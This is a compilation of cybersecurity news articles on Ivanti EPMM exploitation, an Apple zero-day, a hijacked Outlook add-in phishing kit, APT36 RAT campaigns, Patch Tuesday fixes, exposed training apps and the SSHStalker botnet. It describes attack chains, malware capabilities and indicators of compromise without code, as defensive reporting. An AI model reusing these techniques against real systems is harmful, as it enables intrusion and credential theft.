The Demographics of the Divide The research surveyed a senior cohort: 85% of respondents are Manager-level or above, representing organizations where 66% employ 5,000+ people across finance, healthcare, and retail sectors. Download the full research here → What is CTEM? If you aren’t familiar, CTEM involves shifting from “patch everything reactively” to “continuously discover, validate, and prioritize risk exposures that can actually hurt the business.” It’s widely discussed in cybersecurity now as a next-generation evolution of exposure/risk management, and the new report reinforces Gartner’s view that businesses adopting it will consistently demonstrate stronger security outcomes than those that don’t. Awareness Is High.

Adoption Is Rare. One surprising finding: There doesn’t seem to be a problem with awareness, just implementation. 87% of security leaders recognize the importance of CTEM, but only 16% have translated that awareness into operational reality. So, if they’ve heard of it, why aren’t they using it?

The gap between awareness and implementation reveals modern security’s central dilemma: which priority wins? Security leaders understand the CTEM conceptually but struggle to sell its benefits in the face of organizational inertia, competing priorities, and budget constraints that force impossible tradeoffs. The challenge of gaining management buy-in is one reason why we prepared

this report

to provide the statistics that make the business case impossible to ignore. Complexity is the New Multiplier For example: Beyond a certain threshold, manual tracking of all the additional integrations, scripts, and dependencies breaks down, ownership blurs, and blind spots multiply.

The research makes it clear that attack surface complexity is not just a management challenge; it’s a direct risk multiplier. We can see this clearly in the graph below. Attack rates rise linearly from 5% (0-10 domains) to 18% (51-100 domains), then rise steeply past 100 domains. This sudden increase is driven by the ‘visibility gap’, the gulf between the assets a company is responsible for monitoring and those it’s aware of.

Each additional domain can add dozens of connected assets, and when the count climbs past 100, this can translate to thousands of additional scripts: each one a possible attack vector. Traditional snapshot security cannot hope to log and monitor them all. Only CTEM-driven programs can provide the oversight to continuously identify and validate the dark assets hiding in this visibility gap – before attackers do. Why This Matters Now Security leaders are currently facing a ‘perfect storm’ of demands.

At a time when 91% of CISOs report an increase in third-party incidents, average breach costs have climbed to $4.44M, and PCI DSS 4.0.1 brings stricter monitoring and the ever-present specter of penalties. With this in mind, the report shows that attack surface management has become an issue for the boardroom as much as the server room, and the C-suite reader can only conclude that continuing to trust manual oversight and periodic controls to manage such a complex, high-stakes challenge would be self-destructive. One of the clearest signals in this research comes from the peer benchmarking data. When organizations compare themselves side by side – by attack surface size, visibility, tooling, and outcomes – a pattern emerges that is difficult to ignore: beyond a certain level of complexity, traditional security approaches stop scaling.

The takeaway from the peer benchmarks is clear: below a certain level of exposure, organizations can rely on periodic controls and manual oversight. Above it, those models no longer hold. For security leaders operating in high-complexity environments, the question is no longer whether CTEM is valuable – it is whether their current approach can realistically keep up without it. Download the full market research here .

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

83% of Ivanti EPMM Exploits Linked to Single IP on Bulletproof Hosting Infrastructure

A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. Threat intelligence firm GreyNoise said it recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026. An estimated 346 exploitation sessions have originated from 193.24.123[.]42, accounting for 83% of all attempts. The malicious activity is designed to exploit CVE-2026-1281 (CVSS scores: 9.8), one of the two critical security vulnerabilities in EPMM, along with CVE-2026-1340 that could be exploited by an attacker to achieve unauthenticated remote code execution.

Late last month, Ivanti acknowledged it’s aware of a “very limited number of customers” who were impacted following the zero-day exploitation of the issues. Since then, multiple European agencies, including the Netherlands’ Dutch Data Protection Authority (AP), Council for the Judiciary, the European Commission, and Finland’s Valtori, have disclosed that they were targeted by unknown threat actors using the vulnerabilities. Further analysis has revealed that the same host has been simultaneously exploiting three other CVEs across unrelated software - CVE-2026-21962 (Oracle WebLogic) - 2,902 sessions CVE-2026-24061 (GNU InetUtils telnetd) - 497 sessions CVE-2025-24799 (GLPI) - 200 sessions “The IP rotates through 300+ unique user agent strings spanning Chrome, Firefox, Safari, and multiple operating system variants,” GreyNoise said. “This fingerprint diversity, combined with concurrent exploitation of four unrelated software products, is consistent with automated tooling.” It’s worth noting that PROSPERO is assessed to be linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish.

GreyNoise also pointed out that 85% of the exploitation sessions beaconed home via the domain name system (DNS) to confirm “this target is exploitable” without deploying any malware or exfiltrating data. The disclosure comes days after Defused Cyber reported a “sleeper shell” campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances at the path “/mifs/403.jsp.” The cybersecurity company said the activity is indicative of initial access broker tradecraft, where threat actors establish a foothold to sell or hand off access later for financial gain. “That pattern is significant,” it noted. “OAST [out-of-band application security testing] callbacks indicate the campaign is cataloging which targets are vulnerable rather than deploying payloads immediately.

This is consistent with initial access operations that verify exploitability first and deploy follow-on tooling later.” Ivanti EPMM users are recommended to apply the patches, audit internet-facing Mobile Device Management (MDM) infrastructure, review DNS logs for OAST-pattern callbacks, and monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO’s autonomous system (AS200593) at the network perimeter level. “EPMM compromise provides access to device management infrastructure for entire organizations, creating a lateral movement platform that bypasses traditional network segmentation,” GreyNoise said. “Organizations with internet-facing MDM, VPN concentrators, or other remote access infrastructure should operate under the assumption that critical vulnerabilities face exploitation within hours of disclosure.” Update Following the publication of the story, an Ivanti spokesperson shared the below statement with The Hacker News - Ivanti’s recommendation remains the same: customers who have not yet patched should do so immediately, and then review their appliance for any signs of exploitation that may have occurred prior to patching. Applying the patch is the most effective way to prevent exploitation, regardless of how IoCs change over time, especially once a POC is available.

The patch requires no downtime and takes only seconds to apply. Ivanti has provided customers with high-fidelity indicators of compromise, technical analysis at disclosure, and an Exploitation Detection script developed with NCSC-NL, and continues to support customers as we respond to this threat. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

AI Security Isn’t Optional—Join the Conversation at SANS Security West

Apple Fixes Exploited Zero-Day Affecting iOS, macOS, and Other Devices

Apple on Wednesday released iOS, iPadOS, macOS Tahoe, tvOS, watchOS, and visionOS updates to address a zero-day flaw that it said has been exploited in sophisticated cyber attacks. The vulnerability, tracked as CVE-2026-20700 (CVSS score: N/A), has been described as a memory corruption issue in dyld, Apple’s Dynamic Link Editor. Successful exploitation of the vulnerability could allow an attacker with memory write capability to execute arbitrary code on susceptible devices. Google Threat Analysis Group (TAG) has been credited with discovering and reporting the bug.

“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26,” the company said in an advisory. “CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.” It’s worth noting that both CVE-2025-14174 and CVE-2025-43529 were addressed by Cupertino in December 2025, with the former first disclosed by Google as having been exploited in the wild. CVE-2025-14174 (CVSS score: 8.8) relates to an out-of-bounds memory access in ANGLE’s Metal renderer component. Metal is a high-performance hardware-accelerated graphics and compute API developed by Apple.

CVE-2025-43529 (CVSS score: 8.8), on the other hand, is a use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content. The updates are available for the following devices and operating systems - iOS 26.3 and iPadOS 26.3

• iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later macOS Tahoe 26.3
• Macs running macOS Tahoe tvOS 26.3
• Apple TV HD and Apple TV 4K (all models) watchOS 26.3
• Apple Watch Series 6 and later visionOS 26.3
• Apple Vision Pro (all models) In addition, Apple has also released updates to resolve various vulnerabilities in older versions of iOS, iPadOs, macOS, and Safari - iOS 18.7.5 and iPadOS 18.7.5
• iPhone XS, iPhone XS Max, iPhone XR, iPad 7th generation macOS Sequoia 15.7.4
• Macs running macOS Sequoia macOS Sonoma 14.8.4
• Macs running macOS Sonoma Safari 26.3
• Macs running macOS Sonoma and macOS Sequoia With the latest development, Apple has moved to address its first actively exploited zero-day in 2026. Last year, the company patched nine zero-day vulnerabilities that were exploited in the wild. Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

First Malicious Outlook Add-In Found Stealing 4,000+ Microsoft Credentials

Cybersecurity researchers have discovered what they said is the first known malicious Microsoft Outlook add-in detected in the wild. In this unusual supply chain attack detailed by Koi Security, an unknown attacker claimed the domain associated with a now-abandoned legitimate add-in to serve a fake Microsoft login page, stealing over 4,000 credentials in the process. The activity has been codenamed AgreeToSteal by the cybersecurity company. The Outlook add-in in question is AgreeTo , which is advertised by its developer as a way for users to connect different calendars in a single place and share their availability through email.

The add-in was last updated in December 2022. Idan Dardikman, co-founder and CTO of Koi, told The Hacker News that the incident represents a broadening of supply chain attack vectors. “This is the same class of attack we’ve seen in browser extensions, npm packages, and IDE plugins: a trusted distribution channel where the content can change after approval,” Dardikman said. “What makes Office add-ins particularly concerning is the combination of factors: they run inside Outlook, where users handle their most sensitive communications, they can request permissions to read and modify emails, and they’re distributed through Microsoft’s own store , which carries implicit trust.” “The AgreeTo case adds another dimension: the original developer did nothing wrong.

They built a legitimate product and moved on. The attack exploited the gap between when a developer abandons a project and when the platform notices. Every marketplace that hosts remote dynamic dependencies is susceptible to this.” At its core, the attack exploits how Office add-ins work and the lack of periodic content monitoring of add-ins published to the Marketplace. According to Microsoft’s documentation, add-in developers are required to create an account and submit their solution to the Partner Center, following which it is subjected to an approval process.

What’s more, Office add-ins make use of a manifest file that declares a URL, the contents of which are fetched and served in real-time from the developer’s server every time it’s opened within an iframe element inside the application. However, there is nothing stopping a bad actor from taking control of an expired domain. In the case of AgreeTo, the manifest file pointed to a URL hosted on Vercel (“outlook-one.vercel[.]app”), which became claimable after the developer’s Vercel deployment was deleted due to it essentially becoming abandonware sometime around 2023. The infrastructure is still live as of writing.

The attacker took advantage of this behavior to stage a phishing kit on that URL that displayed a fake Microsoft sign-in page, capturing entered passwords, exfiltrating the details via the Telegram Bot API, and eventually redirecting the victim to the actual Microsoft login page. But Koi warns that the incident could have been worse. Given that the add-in is configured with “ ReadWriteItem “ permissions – which allows it to read and modify the user’s emails – a threat actor could have abused this blind spot to deploy JavaScript that can covertly siphon a victim’s mailbox contents. The findings once again bring to fore the need for rescanning packaged and tools uploaded to marketplaces and repositories to flag malicious/suspicious activity.

Dardikman said while Microsoft reviews the manifest during the initial submission phase, there is no control over the actual content that is retrieved live from the developer’s server every time the add-in is opened, once it’s signed and approved. As a result, the absence of continued monitoring of what the URL serves opens the door to unintended security risks. “Office add-ins are fundamentally different from traditional software,” Dardikman added. “They don’t ship a static code bundle.

The manifest simply declares a URL, and whatever that URL serves at any given moment is what runs inside Outlook. In AgreeTo’s case, Microsoft signed the manifest in December 2022, pointing to outlook-one.vercel.app. That same URL is now serving a phishing kit, and the add-in is still listed in the store.” To counter the security issues posed by the threat, Koi recommends a number of steps that Microsoft can take - Trigger a re-review when an add-in’s URL starts returning different content from what it was during review. Verify ownership of the domain to ensure that it’s managed by the add-in developer, and flag add-ins where the domain infrastructure has changed hands.

Implement a mechanism for delisting or flagging add-ins that have not been updated beyond a certain time period. Display installation counts as a way to assess impact. The Hacker News has reached out to Microsoft for comment, and we will update the story if we hear back. It bears noting that the problem is not limited to Microsoft Marketplace or the Office Store alone.

Last month, Open VSX announced plans to enforce security checks before Microsoft Visual Studio Code (VS Code) extensions are published to the open-source repository. Microsoft’s VS Code Marketplace, similarly, does periodic bulk rescanning of all packages in the registry. “The structural problem is the same across all marketplaces that host remote dynamic dependencies: approve once, trust forever,” Dardikman said. “The specifics vary by platform, but the fundamental gap that enabled AgreeTo exists anywhere a marketplace reviews a manifest at submission without monitoring what the referenced URLs actually serve afterward.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines. The campaigns are characterized by the use of malware families like Geta RAT , Ares RAT , and DeskRAT , which are often attributed to Pakistan-aligned threat clusters tracked as SideCopy and APT36 (aka Transparent Tribe). SideCopy, active since at least 2019, is assessed to operate as a subdivision of Transparent Tribe. “Taken together, these campaigns reinforce a familiar but evolving narrative,” Aditya K.

Sood, vice president of Security Engineering and AI Strategy at Aryaka, said . “Transparent Tribe and SideCopy are not reinventing espionage – they are refining it.” “By expanding cross-platform coverage, leaning into memory-resident techniques, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining strategic focus.” Common to all the campaigns is the use of phishing emails containing malicious attachments or embedded download links that lead prospective targets to attacker-controlled infrastructure. These initial access mechanisms serve as a conduit for Windows shortcuts (LNK), ELF binaries, and PowerPoint Add-In files that, when opened, launch a multi-stage process to drop the trojans. The malware families are designed to provide persistent remote access, enable system reconnaissance, collect data, execute commands, and facilitate long-term post-compromise operations across both Windows and Linux environments.

One of the attack chains is as follows: a malicious LNK file invokes “mshta.exe” to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript to decrypt an embedded DLL payload, which, in turn, processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the saved decoy file. After the lure document is displayed, the malware checks for installed security products and adapts its persistence method accordingly prior to deploying Geta RAT on the compromised host. It’s worth noting this attack chain was detailed by CYFIRMA and Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.

Geta RAT supports various commands to collect system information, enumerate running processes, terminate a specified process, list installed apps, gather credentials, retrieve and replace clipboard contents with attacker-supplied data, capture screenshots, perform file operations, run arbitrary shell commands, and harvest data from connected USB devices. Running parallel to this Windows-focused campaign is a Linux variant that employs a Go binary as a starting point to drop a Python-based Ares RAT by means of a shell script downloaded from an external server. Like Geta RAT, Ares RAT can also run a wide range of commands to harvest sensitive data and run Python scripts or commands issued by the threat actor. Aryaka said it also observed another campaign where the Golang malware, DeskRAT, is delivered via a rogue PowerPoint Add-In file that runs embedded macro to establish outbound communication with a remote server to fetch the malware.

APT36’s use of DeskRAT was documented by Sekoia and QiAnXin XLab in October 2025. “These campaigns demonstrate a well-resourced, espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure,” the company said. “The activity extends beyond defense to policy, research, critical infrastructure, and defense-adjacent organizations operating within the same trusted ecosystem.” “The deployment of DeskRAT, alongside Geta RAT and Ares RAT, underscores an evolving toolkit optimized for stealth, persistence, and long-term access.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Over 60 Software Vendors Issue Security Fixes Across OS, Cloud, and Network Platforms

It’s Patch Tuesday, which means a number of software vendors have released patches for various security vulnerabilities impacting their products and services. Microsoft issued fixes for 59 flaws, including six actively exploited zero-days in various Windows components that could be abused to bypass security features, escalate privileges, and trigger a denial-of-service (DoS) condition. Elsewhere, Adobe released updates for Audition, After Effects, InDesign Desktop, Substance 3D, Bridge, Lightroom Classic, and DNG SDK. The company said it’s not aware of in-the-wild exploitation of any of the shortcomings.

SAP shipped fixes for two critical-severity vulnerabilities, including a code injection bug in SAP CRM and SAP S/4HANA (CVE-2026-0488, CVSS score: 9.9) that an authenticated attacker could use to run an arbitrary SQL statement and lead to a full database compromise. The second critical vulnerability is a case of a missing authorization check in SAP NetWeaver Application Server ABAP and ABAP Platform (CVE-2026-0509, CVSS score: 9.6) that could permit an authenticated, low-privileged user to perform certain background Remote Function Calls without the required S_RFC authorization. “To patch the vulnerability, customers must implement a kernel update and set a profile parameter,” Onapsis said . “Adjustments in user roles and UCON settings might be required to not interrupt business processes.” Rounding off the list, Intel and Google said they teamed up to examine the security of Intel Trust Domain Extensions ( TDX ) 1.5, uncovering five vulnerabilities in the module ( CVE-2025-32007, CVE-2025-27940, CVE-2025-30513, CVE-2025-27572, and CVE-2025-32467 ), and nearly three dozen weaknesses, bugs, and improvement suggestions.

“Intel TDX 1.5 introduces new features and functionality that bring confidential computing significantly closer to feature parity with traditional virtualization solutions,” Google said. “At the same time, these features have increased the complexity of a highly privileged software component in the TCB [Trusted Computing Base].” Software Patches from Other Vendors Security updates have also been released by other vendors in recent weeks to rectify several vulnerabilities, including — ABB Amazon Web Services AMD AMI Apple ASUS AutomationDirect AVEVA Broadcom (including VMware) Canon Check Point Cisco Citrix Commvault ConnectWise D-Link Dassault Systèmes Dell Devolutions dormakaba Drupal F5 Fortinet Foxit Software FUJIFILM Fujitsu Gigabyte GitLab Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision Hitachi Energy HP HP Enterprise (including Aruba Networking and Juniper Networks ) IBM Intel Ivanti Lenovo Linux distributions AlmaLinux , Alpine Linux , Amazon Linux , Arch Linux , Debian , Gentoo , Oracle Linux , Mageia , Red Hat , Rocky Linux , SUSE , and Ubuntu MediaTek Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Thunderbird n8n NVIDIA Phoenix Contact QNAP Qualcomm Ricoh Rockwell Automation Samsung Schneider Electric ServiceNow Siemens SolarWinds Splunk Spring Framework Supermicro Synology TP-Link WatchGuard Zoho ManageEngine Zoom , and Zyxel Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Exposed Training Open the Door for Crypto-Mining in Fortune 500 Cloud Environments

Intentionally vulnerable training applications are widely used for security education, internal testing, and product demonstrations. Tools such as OWASP Juice Shop, DVWA, Hackazon, and bWAPP are designed to be insecure by default, making them useful for learning how common attack techniques work in controlled environments. The issue is not the applications themselves, but how they are often deployed and maintained in real-world cloud environments. Pentera Labs examined how training and demo applications are being used across cloud infrastructures and identified a recurring pattern: applications intended for isolated lab use were frequently found exposed to the public internet, running inside active cloud accounts, and connected to cloud identities with broader access than required.

Deployment Patterns Observed in the Research Pentera Labs research found that these applications were often deployed with default configurations, minimal isolation, and overly permissive cloud roles. The investigation uncovered that many of these exposed training environments were directly connected to active cloud identities and privileged roles, enabling attackers to move far beyond the vulnerable applications themselves and potentially into the customer’s broader cloud infrastructure. In these scenarios, a single exposed training application can act as an initial foothold. Once attackers are able to leverage connected cloud identities and privileged roles, they are no longer constrained to the original application or host.

Instead, they may gain the ability to interact with other resources within the same cloud environment, significantly increasing the scope and potential impact of the compromise. As part of the investigation, Pentera Labs verified nearly 2,000 live, exposed training application instances , with close to 60% hosted on customer-managed infrastructure running on AWS, Azure, or GCP . Evidence of Active Exploitation The exposed training environments identified during the research were not simply misconfigured. Pentera Labs observed clear evidence that attackers were actively exploiting this exposure in the wild.

Across the broader dataset of exposed training applications, approximately 20% of instances were found to contain artifacts deployed by malicious actors , including crypto-mining activity, webshells, and persistence mechanisms. These artifacts indicated prior compromise and ongoing abuse of exposed systems. The presence of active crypto-mining and persistence tooling demonstrates that exposed training applications are not only discoverable but are already being exploited at scale. Scope of Impact The exposed and exploited environments identified during the research were not limited to small or isolated test systems.

Pentera Labs observed this deployment pattern across cloud environments associated with Fortune 500 organizations and leading cybersecurity vendors, including Palo Alto, F5, and Cloudflare. While individual environments varied, the underlying pattern remained consistent: a training or demo application deployed without sufficient isolation, left publicly accessible, and connected to privileged cloud identities. Why This Matters Training and demo environments are frequently treated as low-risk or temporary assets. As a result, they are often excluded from standard security monitoring, access reviews, and lifecycle management processes.

Over time, these environments may remain exposed long after their original purpose has passed. The research shows that exploitation does not require zero-day vulnerabilities or advanced attack techniques. Default credentials, known weaknesses, and public exposure were sufficient to turn training applications into an entry point for broader cloud access. Labeling an environment as “training” or “test” does not reduce its risk.

When exposed to the internet and connected to privileged cloud identities, these systems become part of the organization’s effective attack surface. Refer to the full Pentera Labs research blog & join a live webinar on Feb 12th to learn more about the methodology, discovery process, and real-world exploitation observed during this research. This article was written by Noam Yaffe, Senior Security Researcher at Pentera Labs. For questions or discussion, contact labs@pentera.io Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Microsoft Patches 59 Vulnerabilities Including Six Actively Exploited Zero-Days

Microsoft on Tuesday released security updates to address a set of 59 flaws across its software, including six vulnerabilities that it said have been exploited in the wild. Of the 59 flaws, five are rated Critical, 52 are rated Important, and two are rated Moderate in severity. Twenty-five of the patched vulnerabilities have been classified as privilege escalation, followed by remote code execution (12), spoofing (7), information disclosure (6), security feature bypass (5), denial-of-service (3), and cross-site scripting (1). It’s worth noting that the patches are in addition to three security flaws that Microsoft has addressed in its Edge browser since the release of the January 2026 Patch Tuesday update , including a Moderate vulnerability impacting the Edge browser for Android ( CVE-2026-0391 , CVSS score: 6.5) that could allow an unauthorized attacker to perform spoofing over a network by taking advantage of a “user interface misrepresentation of critical information.” Topping the list of this month’s updates are six vulnerabilities that have been flagged as actively exploited - CVE-2026-21510 (CVSS score: 8.8) - A protection mechanism failure in Windows Shell that allows an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21513 (CVSS score: 8.8) - A protection mechanism failure in MSHTML Framework that allows an unauthorized attacker to bypass a security feature over a network. CVE-2026-21514 (CVSS score: 7.8) - A reliance on untrusted inputs in a security decision in Microsoft Office Word that allows an unauthorized attacker to bypass a security feature locally. CVE-2026-21519 (CVSS score: 7.8) - An access of resource using incompatible type (‘type confusion’) in the Desktop Window Manager that allows an authorized attacker to elevate privileges locally. CVE-2026-21525 (CVSS score: 6.2) - A null pointer dereference in Windows Remote Access Connection Manager that allows an unauthorized attacker to deny service locally.

CVE-2026-21533 (CVSS score: 7.8) - An improper privilege management in Windows Remote Desktop that allows an authorized attacker to elevate privileges locally. Microsoft’s own security teams and Google Threat Intelligence Group (GTIG) have been credited with discovering and reporting the first three flaws, which have been listed as publicly known at the time of release. There are currently no details on how the vulnerabilities are being exploited, and if they were weaponized as part of the same campaign. “CVE-2026-21513 is a security feature bypass vulnerability in the Microsoft MSHTML Framework, a core component used by Windows and multiple applications to render HTML content,” Jack Bicer, director of vulnerability research at Action1, said .

“It is caused by a protection mechanism failure that allows attackers to bypass execution prompts when users interact with malicious files. A crafted file can silently bypass Windows security prompts and trigger dangerous actions with a single click.” Satnam Narang, senior staff research engineer at Tenable, said CVE-2026-21513 and CVE-2026-21514 bear a “lot of similarities” to CVE-2026-21510, the main difference being that CVE-2026-21513 can also be exploited using an HTML file, while CVE-2026-21514 can only be exploited using a Microsoft Office file. As for CVE-2026-21525, it’s linked to a zero-day that ACROS Security’s 0patch service said it discovered in December 2025 while investigating another related flaw in the same component ( CVE-2025-59230 ). “These [CVE-2026-21519 and CVE-2026-21533] are local privilege escalation vulnerabilities, which means an attacker must have already gained access to a vulnerable host,” Kev Breen, senior director of cyber threat research at Immersive, told The Hacker News via email.

“This could occur through a malicious attachment, a remote code execution vulnerability, or lateral movement from another compromised system.” “Once on the host, the attacker can use these escalation vulnerabilities to elevate privileges to SYSTEM. With this level of access, a threat actor could disable security tooling, deploy additional malware, or, in worst-case scenarios, access secrets or credentials that could lead to full domain compromise.” Cybersecurity vendor CrowdStrike, which has been acknowledged for reporting CVE-2026-21533, said it does not attribute the exploitation activity to a specific adversary, but noted that threat actors in possession of the exploit binaries will likely ramp up their efforts to use or sell them in the near term. “The CVE-2026-21533 exploit binary modifies a service configuration key, replacing it with an attacker-controlled key, which could enable adversaries to escalate privileges to add a new user to the Administrator group,” Adam Meyers, head of Counter Adversary Operations at CrowdStrike, told The Hacker News in an emailed statement. The development has prompted the U.S.

Cybersecurity and Infrastructure Security Agency (CISA) to add all six vulnerabilities to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by March 3, 2026. The update also coincides with Microsoft rolling out updated Secure Boot certificates to replace the original 2011 certificates that will expire in late June 2026. The new certificates will be installed through the regular monthly Windows update process without any additional action. “If a device does not receive the new Secure Boot certificates before the 2011 certificates expire, the PC will continue to function normally, and existing software will keep running,” the tech giant said .

“However, the device will enter a degraded security state that limits its ability to receive future boot-level protections.” “As new boot‑level vulnerabilities are discovered, affected systems become increasingly exposed because they can no longer install new mitigations. Over time, this may also lead to compatibility issues, as newer operating systems, firmware, hardware, or Secure Boot–dependent software may fail to load.” In tandem, the company said it’s also strengthening default protections in Windows through two security initiatives, Windows Baseline Security Mode and User Transparency and Consent. The updates come under the purview of the Secure Future Initiative and Windows Resiliency Initiative . “With Windows Baseline Security Mode, Windows will move toward operating with runtime integrity safeguards enabled by default,” it noted .

“These safeguards ensure that only properly signed apps, services, and drivers are allowed to run, helping to protect the system from tampering or unauthorized changes.” User Transparency and Consent, analogous to Apple macOS Transparency, Consent, and Control ( TCC ) framework, aims to introduce a consistent approach to handling security decisions. The operating system will prompt users when apps try to access sensitive resources, such as files, the camera, or the microphone, or when they attempt to install other unintended software. “These prompts are designed to be clear and actionable, and you’ll always have the ability to review and change your choices later,” Logan Iyer, Distinguished Engineer at Microsoft, said. “Apps and AI agents will also be expected to meet higher transparency standards, giving both users and IT administrators better visibility into their behaviors.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

SSHStalker Botnet Uses IRC C2 to Control Linux Systems via Legacy Kernel Exploits

Cybersecurity researchers have disclosed details of a new botnet operation called SSHStalker that relies on the Internet Relay Chat ( IRC ) communication protocol for command-and-control (C2) purposes. “The toolset blends stealth helpers with legacy-era Linux exploitation: Alongside log cleaners (utmp/wtmp/lastlog tampering) and rootkit-class artifacts, the actor keeps a large back-catalog of Linux 2.6.x-era exploits (2009–2010 CVEs),” cybersecurity company Flare said . “These are low value against modern stacks, but remain effective against ‘forgotten’ infrastructure and long-tail legacy environments.” SSHStalker combines IRC botnet mechanics with an automated mass-compromise operation that uses an SSH scanner and other readily available scanners to co-opt susceptible systems into a network and enroll them in IRC channels. However, unlike other campaigns that typically leverage such botnets for opportunistic efforts like distributed denial-of-service (DDoS) attacks, proxyjacking, or cryptocurrency mining, SSHStalker has been found to maintain persistent access without any follow-on post-exploitation behavior.

This dormant behavior sets it apart, raising the possibility that the compromised infrastructure is being used for staging, testing, or strategic access retention for future use. A core component of SSHStalker is a Golang scanner that scans for port 22 for servers with open SSH in order to extend its reach in a worm-like fashion. Also dropped are several payloads, including variants of an IRC-controlled bot and a Perl file bot that connects to an UnrealIRCd IRC Server, joins a control channel, and waits for commands that allow it to carry out flood-style traffic attacks and commandeer the bots. The attacks are also characterized by the execution of C program files to clean SSH connection logs and erase traces of malicious activity from logs to reduce forensic visibility.

Furthermore, the malware toolkit contains a “keep-alive” component that ensures the main malware process is relaunched within 60 seconds in the event it’s terminated by a security tool. SSHStalker is notable for blending mass compromise automation with a catalog of 16 distinct vulnerabilities impacting the Linux kernel, some going all the way back to 2009. Some of the flaws used in the exploit module are CVE-2009-2692 , CVE-2009-2698 , CVE-2010-3849 , CVE-2010-1173 , CVE-2009-2267 , CVE-2009-2908 , CVE-2009-3547 , CVE-2010-2959 , and CVE-2010-3437 . Flare’s investigation of the staging infrastructure associated with the threat actor has uncovered an extensive repository of open-source offensive tooling and previously published malware samples.

These include - Rootkits to facilitate stealth and persistence Cryptocurrency miners A Python script that executes a binary called “website grabber” to steal exposed Amazon Web Services (AWS) secrets from targeted websites EnergyMech, an IRC bot that provides C2 and remote command execution capabilities It’s suspected that the threat actor behind the activity could be of Romanian origin, given the presence of “Romanian-style nicknames, slang patterns, and naming conventions inside IRC channels and configuration wordlists.” What’s more, the operational fingerprint exhibits strong overlaps with that of a hacking group known as Outlaw (aka Dota). “SSHStalker does not appear to focus on novel exploit development but instead demonstrates operational control through mature implementation and orchestration, by primarily using C for core bot and low-level components, shell for orchestration and persistence, and limited Python and Perl usage mainly for utility or supporting automation tasks inside the attack chain and running the IRCbot,” Flare said. “The threat actor is not developing zero-days or novel rootkits, but demonstrating strong operational discipline in mass compromise workflows, infrastructure recycling, and long-tail persistence across heterogeneous Linux environments.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.